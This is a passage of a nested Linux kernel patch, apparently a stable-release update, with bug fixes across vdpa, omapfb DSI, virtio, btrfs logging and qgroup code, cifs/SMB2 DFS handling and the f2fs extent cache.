++		err = mlx5_vdpa_create_mr(mvdev, NULL, 0);
+ 		if (err)
+ 			goto err_res;
+ 	}
+@@ -3239,8 +3205,8 @@ static void mlx5_vdpa_dev_del(struct vdpa_mgmt_dev *v_mdev, struct vdpa_device *
+ 	struct workqueue_struct *wq;
+ 
+ 	if (ndev->nb_registered) {
+-		mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 		ndev->nb_registered = false;
++		mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	}
+ 	wq = mvdev->wq;
+ 	mvdev->wq = NULL;
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+index 11f5a121df243..584b975a98a7e 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+@@ -62,6 +62,9 @@ static bool receive_filter(struct vdpasim *vdpasim, size_t len)
+ 	if (len < ETH_ALEN + hdr_len)
+ 		return false;
+ 
++	if (is_broadcast_ether_addr(vdpasim->buffer + hdr_len) ||
++	    is_multicast_ether_addr(vdpasim->buffer + hdr_len))
++		return true;
+ 	if (!strncmp(vdpasim->buffer + hdr_len, vio_config->mac, ETH_ALEN))
+ 		return true;
+ 
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 35dceee3ed560..31017ebc4d7c7 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -1440,6 +1440,9 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (config->config_size > PAGE_SIZE)
+ 		return false;
+ 
++	if (config->vq_num > 0xffff)
++		return false;
++
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+diff --git a/drivers/video/fbdev/omap2/omapfb/dss/dsi.c b/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
+index 54b0f034c2edf..7cddb7b8ae344 100644
+--- a/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
++++ b/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
+@@ -1536,22 +1536,28 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ {
+ 	struct dsi_data *dsi = dsi_get_dsidrv_data(dsidev);
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kzalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats) {
++		seq_printf(s, "out of memory\n");
++		return;
++	}
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1])
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1])
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1575,10 +1581,10 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1594,7 +1600,7 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
+ 	PIS(ERRSYNCESC1);
+@@ -1618,6 +1624,8 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 	PIS(ULPSACTIVENOT_ALL0);
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
++
++	kfree(stats);
+ }
+ 
+ static void dsi1_dump_irqs(struct seq_file *s)
+diff --git a/drivers/virtio/virtio_pci_modern.c b/drivers/virtio/virtio_pci_modern.c
+index c3b9f27618497..edf2e18014cdf 100644
+--- a/drivers/virtio/virtio_pci_modern.c
++++ b/drivers/virtio/virtio_pci_modern.c
+@@ -303,7 +303,7 @@ static struct virtqueue *setup_vq(struct virtio_pci_device *vp_dev,
+ 	int err;
+ 
+ 	if (index >= vp_modern_get_num_queues(mdev))
+-		return ERR_PTR(-ENOENT);
++		return ERR_PTR(-EINVAL);
+ 
+ 	/* Check if queue is either not available or already active. */
+ 	num = vp_modern_get_queue_size(mdev, index);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 6538f52262ca4..883a3671a9774 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -344,7 +344,14 @@ error:
+ 	btrfs_print_tree(eb, 0);
+ 	btrfs_err(fs_info, "block=%llu write time tree block corruption detected",
+ 		  eb->start);
+-	WARN_ON(IS_ENABLED(CONFIG_BTRFS_DEBUG));
++	/*
++	 * Be noisy if this is an extent buffer from a log tree. We don't abort
++	 * a transaction in case there's a bad log tree extent buffer, we just
++	 * fallback to a transaction commit. Still we want to know when there is
++	 * a bad log tree extent buffer, as that may signal a bug somewhere.
++	 */
++	WARN_ON(IS_ENABLED(CONFIG_BTRFS_DEBUG) ||
++		btrfs_header_owner(eb) == BTRFS_TREE_LOG_OBJECTID);
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 2801c991814f5..571fcc5ae4dcf 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1706,6 +1706,11 @@ static int run_one_delayed_ref(struct btrfs_trans_handle *trans,
+ 		BUG();
+ 	if (ret && insert_reserved)
+ 		btrfs_pin_extent(trans, node->bytenr, node->num_bytes, 1);
++	if (ret < 0)
++		btrfs_err(trans->fs_info,
++"failed to run delayed ref for logical %llu num_bytes %llu type %u action %u ref_mod %d: %d",
++			  node->bytenr, node->num_bytes, node->type,
++			  node->action, node->ref_mod, ret);
+ 	return ret;
+ }
+ 
+@@ -1947,8 +1952,6 @@ static int btrfs_run_delayed_refs_for_head(struct btrfs_trans_handle *trans,
+ 		if (ret) {
+ 			unselect_delayed_ref_head(delayed_refs, locked_ref);
+ 			btrfs_put_delayed_ref(ref);
+-			btrfs_debug(fs_info, "run_one_delayed_ref returned %d",
+-				    ret);
+ 			return ret;
+ 		}
+ 
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 9bef8eaa074a0..23056d9914d84 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3838,6 +3838,7 @@ static loff_t find_desired_extent(struct btrfs_inode *inode, loff_t offset,
+ 		struct extent_buffer *leaf = path->nodes[0];
+ 		struct btrfs_file_extent_item *extent;
+ 		u64 extent_end;
++		u8 type;
+ 
+ 		if (path->slots[0] >= btrfs_header_nritems(leaf)) {
+ 			ret = btrfs_next_leaf(root, path);
+@@ -3892,10 +3893,16 @@ static loff_t find_desired_extent(struct btrfs_inode *inode, loff_t offset,
+ 
+ 		extent = btrfs_item_ptr(leaf, path->slots[0],
+ 					struct btrfs_file_extent_item);
++		type = btrfs_file_extent_type(leaf, extent);
+ 
+-		if (btrfs_file_extent_disk_bytenr(leaf, extent) == 0 ||
+-		    btrfs_file_extent_type(leaf, extent) ==
+-		    BTRFS_FILE_EXTENT_PREALLOC) {
++		/*
++		 * Can't access the extent's disk_bytenr field if this is an
++		 * inline extent, since at that offset, it's where the extent
++		 * data starts.
++		 */
++		if (type == BTRFS_FILE_EXTENT_PREALLOC ||
++		    (type == BTRFS_FILE_EXTENT_REG &&
++		     btrfs_file_extent_disk_bytenr(leaf, extent) == 0)) {
+ 			/*
+ 			 * Explicit hole or prealloc extent, search for delalloc.
+ 			 * A prealloc extent is treated like a hole.
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index b74105a10f16c..5ac65384c9471 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2751,9 +2751,19 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 			      BTRFS_QGROUP_RUNTIME_FLAG_NO_ACCOUNTING)) {
+ 			/*
+ 			 * Old roots should be searched when inserting qgroup
+-			 * extent record
++			 * extent record.
++			 *
++			 * But for INCONSISTENT (NO_ACCOUNTING) -> rescan case,
++			 * we may have some record inserted during
++			 * NO_ACCOUNTING (thus no old_roots populated), but
++			 * later we start rescan, which clears NO_ACCOUNTING,
++			 * leaving some inserted records without old_roots
++			 * populated.
++			 *
++			 * Those cases are rare and should not cause too much
++			 * time spent during commit_transaction().
+ 			 */
+-			if (WARN_ON(!record->old_roots)) {
++			if (!record->old_roots) {
+ 				/* Search commit root to find old_roots */
+ 				ret = btrfs_find_all_roots(NULL, fs_info,
+ 						record->bytenr, 0,
+@@ -3338,6 +3348,7 @@ static void btrfs_qgroup_rescan_worker(struct btrfs_work *work)
+ 	int err = -ENOMEM;
+ 	int ret = 0;
+ 	bool stopped = false;
++	bool did_leaf_rescans = false;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -3358,6 +3369,7 @@ static void btrfs_qgroup_rescan_worker(struct btrfs_work *work)
+ 		}
+ 
+ 		err = qgroup_rescan_leaf(trans, path);
++		did_leaf_rescans = true;
+ 
+ 		if (err > 0)
+ 			btrfs_commit_transaction(trans);
+@@ -3378,16 +3390,23 @@ out:
+ 	mutex_unlock(&fs_info->qgroup_rescan_lock);
+ 
+ 	/*
+-	 * only update status, since the previous part has already updated the
+-	 * qgroup info.
++	 * Only update status, since the previous part has already updated the
++	 * qgroup info, and only if we did any actual work. This also prevents
++	 * race with a concurrent quota disable, which has already set
++	 * fs_info->quota_root to NULL and cleared BTRFS_FS_QUOTA_ENABLED at
++	 * btrfs_quota_disable().
+ 	 */
+-	trans = btrfs_start_transaction(fs_info->quota_root, 1);
+-	if (IS_ERR(trans)) {
+-		err = PTR_ERR(trans);
++	if (did_leaf_rescans) {
++		trans = btrfs_start_transaction(fs_info->quota_root, 1);
++		if (IS_ERR(trans)) {
++			err = PTR_ERR(trans);
++			trans = NULL;
++			btrfs_err(fs_info,
++				  "fail to start transaction for status update: %d",
++				  err);
++		}
++	} else {
+ 		trans = NULL;
+-		btrfs_err(fs_info,
+-			  "fail to start transaction for status update: %d",
+-			  err);
+ 	}
+ 
+ 	mutex_lock(&fs_info->qgroup_rescan_lock);
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index c3cf3dabe0b1b..7535857f4c8fb 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -3011,7 +3011,6 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 		ret = 0;
+ 	if (ret) {
+ 		blk_finish_plug(&plug);
+-		btrfs_abort_transaction(trans, ret);
+ 		btrfs_set_log_full_commit(trans);
+ 		mutex_unlock(&root->log_mutex);
+ 		goto out;
+@@ -3076,15 +3075,12 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 
+ 		blk_finish_plug(&plug);
+ 		btrfs_set_log_full_commit(trans);
+-
+-		if (ret != -ENOSPC) {
+-			btrfs_abort_transaction(trans, ret);
+-			mutex_unlock(&log_root_tree->log_mutex);
+-			goto out;
+-		}
++		if (ret != -ENOSPC)
++			btrfs_err(fs_info,
++				  "failed to update log for root %llu ret %d",
++				  root->root_key.objectid, ret);
+ 		btrfs_wait_tree_log_extents(log, mark);
+ 		mutex_unlock(&log_root_tree->log_mutex);
+-		ret = BTRFS_LOG_FORCE_COMMIT;
+ 		goto out;
+ 	}
+ 
+@@ -3143,7 +3139,6 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 		goto out_wake_log_root;
+ 	} else if (ret) {
+ 		btrfs_set_log_full_commit(trans);
+-		btrfs_abort_transaction(trans, ret);
+ 		mutex_unlock(&log_root_tree->log_mutex);
+ 		goto out_wake_log_root;
+ 	}
+@@ -3857,7 +3852,10 @@ static noinline int log_dir_items(struct btrfs_trans_handle *trans,
+ 					      path->slots[0]);
+ 			if (tmp.type == BTRFS_DIR_INDEX_KEY)
+ 				last_old_dentry_offset = tmp.offset;
++		} else if (ret < 0) {
++			err = ret;
+ 		}
++
+ 		goto done;
+ 	}
+ 
+@@ -3877,19 +3875,34 @@ static noinline int log_dir_items(struct btrfs_trans_handle *trans,
+ 		 */
+ 		if (tmp.type == BTRFS_DIR_INDEX_KEY)
+ 			last_old_dentry_offset = tmp.offset;
++	} else if (ret < 0) {
++		err = ret;
++		goto done;
+ 	}
++
+ 	btrfs_release_path(path);
+ 
+ 	/*
+-	 * Find the first key from this transaction again.  See the note for
+-	 * log_new_dir_dentries, if we're logging a directory recursively we
+-	 * won't be holding its i_mutex, which means we can modify the directory
+-	 * while we're logging it.  If we remove an entry between our first
+-	 * search and this search we'll not find the key again and can just
+-	 * bail.
++	 * Find the first key from this transaction again or the one we were at
++	 * in the loop below in case we had to reschedule. We may be logging the
++	 * directory without holding its VFS lock, which happen when logging new
++	 * dentries (through log_new_dir_dentries()) or in some cases when we
++	 * need to log the parent directory of an inode. This means a dir index
++	 * key might be deleted from the inode's root, and therefore we may not
++	 * find it anymore. If we can't find it, just move to the next key. We
++	 * can not bail out and ignore, because if we do that we will simply
++	 * not log dir index keys that come after the one that was just deleted
++	 * and we can end up logging a dir index range that ends at (u64)-1
++	 * (@last_offset is initialized to that), resulting in removing dir
++	 * entries we should not remove at log replay time.
+ 	 */
+ search:
+ 	ret = btrfs_search_slot(NULL, root, &min_key, path, 0, 0);
++	if (ret > 0)
++		ret = btrfs_next_item(root, path);
++	if (ret < 0)
++		err = ret;
++	/* If ret is 1, there are no more keys in the inode's root. */
+ 	if (ret != 0)
+ 		goto done;
+ 
+@@ -5608,8 +5621,10 @@ static int add_conflicting_inode(struct btrfs_trans_handle *trans,
+ 	 * LOG_INODE_EXISTS mode) and slow down other fsyncs or transaction
+ 	 * commits.
+ 	 */
+-	if (ctx->num_conflict_inodes >= MAX_CONFLICT_INODES)
++	if (ctx->num_conflict_inodes >= MAX_CONFLICT_INODES) {
++		btrfs_set_log_full_commit(trans);
+ 		return BTRFS_LOG_FORCE_COMMIT;
++	}
+ 
+ 	inode = btrfs_iget(root->fs_info->sb, ino, root);
+ 	/*
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index dba087ad40ea2..65e4e887605f9 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -770,8 +770,11 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 					BTRFS_SUPER_FLAG_CHANGING_FSID_V2);
+ 
+ 	error = lookup_bdev(path, &path_devt);
+-	if (error)
++	if (error) {
++		btrfs_err(NULL, "failed to lookup block device for path %s: %d",
++			  path, error);
+ 		return ERR_PTR(error);
++	}
+ 
+ 	if (fsid_change_in_progress) {
+ 		if (!has_metadata_uuid)
+@@ -836,6 +839,9 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 
+ 	if (!device) {
+ 		if (fs_devices->opened) {
++			btrfs_err(NULL,
++		"device %s belongs to fsid %pU, and the fs is already mounted",
++				  path, fs_devices->fsid);
+ 			mutex_unlock(&fs_devices->device_list_mutex);
+ 			return ERR_PTR(-EBUSY);
+ 		}
+@@ -910,6 +916,9 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 			 * generation are equal.
+ 			 */
+ 			mutex_unlock(&fs_devices->device_list_mutex);
++			btrfs_err(NULL,
++"device %s already registered with a higher generation, found %llu expect %llu",
++				  path, found_transid, device->generation);
+ 			return ERR_PTR(-EEXIST);
+ 		}
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index fde1c371605a1..eab36e4ea1300 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -3554,9 +3554,6 @@ static int is_path_remote(struct mount_ctx *mnt_ctx)
+ 	struct cifs_tcon *tcon = mnt_ctx->tcon;
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	char *full_path;
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	bool nodfs = cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS;
+-#endif
+ 
+ 	if (!server->ops->is_path_accessible)
+ 		return -EOPNOTSUPP;
+@@ -3573,19 +3570,6 @@ static int is_path_remote(struct mount_ctx *mnt_ctx)
+ 
+ 	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+ 					     full_path);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	if (nodfs) {
+-		if (rc == -EREMOTE)
+-			rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* path *might* exist with non-ASCII characters in DFS root
+-	 * try again with full path (only if nodfs is not set) */
+-	if (rc == -ENOENT && is_tcon_dfs(tcon))
+-		rc = cifs_dfs_query_info_nonascii_quirk(xid, tcon, cifs_sb,
+-							full_path);
+-#endif
+ 	if (rc != 0 && rc != -EREMOTE)
+ 		goto out;
+ 
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index 4e2ca3c6e5c00..0c9b619e4386b 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -991,12 +991,6 @@ int cifs_get_inode_info(struct inode **inode, const char *full_path,
+ 		}
+ 		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
+ 						  &adjust_tz, &is_reparse_point);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		if (rc == -ENOENT && is_tcon_dfs(tcon))
+-			rc = cifs_dfs_query_info_nonascii_quirk(xid, tcon,
+-								cifs_sb,
+-								full_path);
+-#endif
+ 		data = &tmp_data;
+ 	}
+ 
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 1cbecd64d697f..062175994e879 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1314,49 +1314,4 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
+-
+-/** cifs_dfs_query_info_nonascii_quirk
+- * Handle weird Windows SMB server behaviour. It responds with
+- * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+- * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+- * where <dfsname> contains non-ASCII unicode symbols.
+- *
+- * Check such DFS reference.
+- */
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *linkpath)
+-{
+-	char *treename, *dfspath, sep;
+-	int treenamelen, linkpathlen, rc;
+-
+-	treename = tcon->tree_name;
+-	/* MS-DFSC: All paths in REQ_GET_DFS_REFERRAL and RESP_GET_DFS_REFERRAL
+-	 * messages MUST be encoded with exactly one leading backslash, not two
+-	 * leading backslashes.
+-	 */
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	if (treename[0] == sep && treename[1] == sep)
+-		treename++;
+-	linkpathlen = strlen(linkpath);
+-	treenamelen = strnlen(treename, MAX_TREE_SIZE + 1);
+-	dfspath = kzalloc(treenamelen + linkpathlen + 1, GFP_KERNEL);
+-	if (!dfspath)
+-		return -ENOMEM;
+-	if (treenamelen)
+-		memcpy(dfspath, treename, treenamelen);
+-	memcpy(dfspath + treenamelen, linkpath, linkpathlen);
+-	rc = dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls,
+-			    cifs_remap(cifs_sb), dfspath, NULL, NULL);
+-	if (rc == 0) {
+-		cifs_dbg(FYI, "DFS ref '%s' is found, emulate -EREMOTE\n",
+-			 dfspath);
+-		rc = -EREMOTE;
+-	} else {
+-		cifs_dbg(FYI, "%s: dfs_cache_find returned %d\n", __func__, rc);
+-	}
+-	kfree(dfspath);
+-	return rc;
+-}
+ #endif
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 68e08c85fbb87..6c84d2983166a 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -540,22 +540,41 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+ 			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
+ 			      err_iov, err_buftype);
+-	if (rc == -EOPNOTSUPP) {
+-		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov[0].iov_base;
++
++		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
++			goto out;
++		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
++		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
++							 &data->symlink_target);
+ 			if (rc)
+ 				goto out;
+-		}
+-		*reparse = true;
+-		create_options |= OPEN_REPARSE_POINT;
+ 
+-		/* Failed on a symbolic link - query a reparse point info */
+-		cifs_get_readable_path(tcon, full_path, &cfile);
+-		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
+-				      FILE_OPEN, create_options, ACL_NO_MODE, data,
+-				      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			*reparse = true;
++			create_options |= OPEN_REPARSE_POINT;
++
++			/* Failed on a symbolic link - query a reparse point info */
++			cifs_get_readable_path(tcon, full_path, &cfile);
++			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++					      FILE_READ_ATTRIBUTES, FILE_OPEN,
++					      create_options, ACL_NO_MODE, data,
++					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			goto out;
++		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
++			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			/*
++			 * Handle weird Windows SMB server behaviour. It responds with
++			 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
++			 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
++			 * where <dfsname> contains non-ASCII unicode symbols.
++			 */
++			rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
+ 	}
+ 
+ out:
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 8da98918cf86b..1ff5b6b0e07a1 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -797,7 +797,9 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int err_buftype = CIFS_NO_BUFFER;
+ 	struct cifs_open_parms oparms;
++	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
+ 
+@@ -821,14 +823,32 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms.fid = &fid;
+ 	oparms.reconnect = false;
+ 
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       &err_iov, &err_buftype);
+ 	if (rc) {
+-		kfree(utf16_path);
+-		return rc;
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++		/*
++		 * Handle weird Windows SMB server behaviour. It responds with
++		 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
++		 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
++		 * where <dfsname> contains non-ASCII unicode symbols.
++		 */
++		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
++		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
++			rc = -EREMOTE;
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++		goto out;
+ 	}
+ 
+ 	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
+ 	kfree(utf16_path);
+ 	return rc;
+ }
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 4ac5b1bfaf781..92f39052d3117 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -541,9 +541,10 @@ static void
+ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 		      struct TCP_Server_Info *server, unsigned int *total_len)
+ {
+-	char *pneg_ctxt;
+-	char *hostname = NULL;
+ 	unsigned int ctxt_len, neg_context_count;
++	struct TCP_Server_Info *pserver;
++	char *pneg_ctxt;
++	char *hostname;
+ 
+ 	if (*total_len > 200) {
+ 		/* In case length corrupted don't want to overrun smb buffer */
+@@ -574,8 +575,9 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 	 * secondary channels don't have the hostname field populated
+ 	 * use the hostname field in the primary channel instead
+ 	 */
+-	hostname = CIFS_SERVER_IS_CHAN(server) ?
+-		server->primary_server->hostname : server->hostname;
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	cifs_server_lock(pserver);
++	hostname = pserver->hostname;
+ 	if (hostname && (hostname[0] != 0)) {
+ 		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
+ 					      hostname);
+@@ -584,6 +586,7 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 		neg_context_count = 3;
+ 	} else
+ 		neg_context_count = 2;
++	cifs_server_unlock(pserver);
+ 
+ 	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+ 	*total_len += sizeof(struct smb2_posix_neg_context);
+@@ -4159,12 +4162,15 @@ smb2_readv_callback(struct mid_q_entry *mid)
+ 				(struct smb2_hdr *)rdata->iov[0].iov_base;
+ 	struct cifs_credits credits = { .value = 0, .instance = 0 };
+ 	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
+-				 .rq_nvec = 1,
+-				 .rq_pages = rdata->pages,
+-				 .rq_offset = rdata->page_offset,
+-				 .rq_npages = rdata->nr_pages,
+-				 .rq_pagesz = rdata->pagesz,
+-				 .rq_tailsz = rdata->tailsz };
++				 .rq_nvec = 1, };
++
++	if (rdata->got_bytes) {
++		rqst.rq_pages = rdata->pages;
++		rqst.rq_offset = rdata->page_offset;
++		rqst.rq_npages = rdata->nr_pages;
++		rqst.rq_pagesz = rdata->pagesz;
++		rqst.rq_tailsz = rdata->tailsz;
++	}
+ 
+ 	WARN_ONCE(rdata->server != mid->server,
+ 		  "rdata server %p != mid server %p",
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 932c070173b97..6c9e6f78a3e37 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -415,7 +415,8 @@ static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+ 	struct extent_node *en;
+ 	bool ret = false;
+ 
+-	f2fs_bug_on(sbi, !et);
++	if (!et)
++		return false;
+ 
+ 	trace_f2fs_lookup_extent_tree_start(inode, pgofs);
+ 
+diff --git a/fs/nfs/filelayout/filelayout.c b/fs/nfs/filelayout/filelayout.c
+index ad34a33b0737c..4974cd18ca468 100644
+--- a/fs/nfs/filelayout/filelayout.c
++++ b/fs/nfs/filelayout/filelayout.c
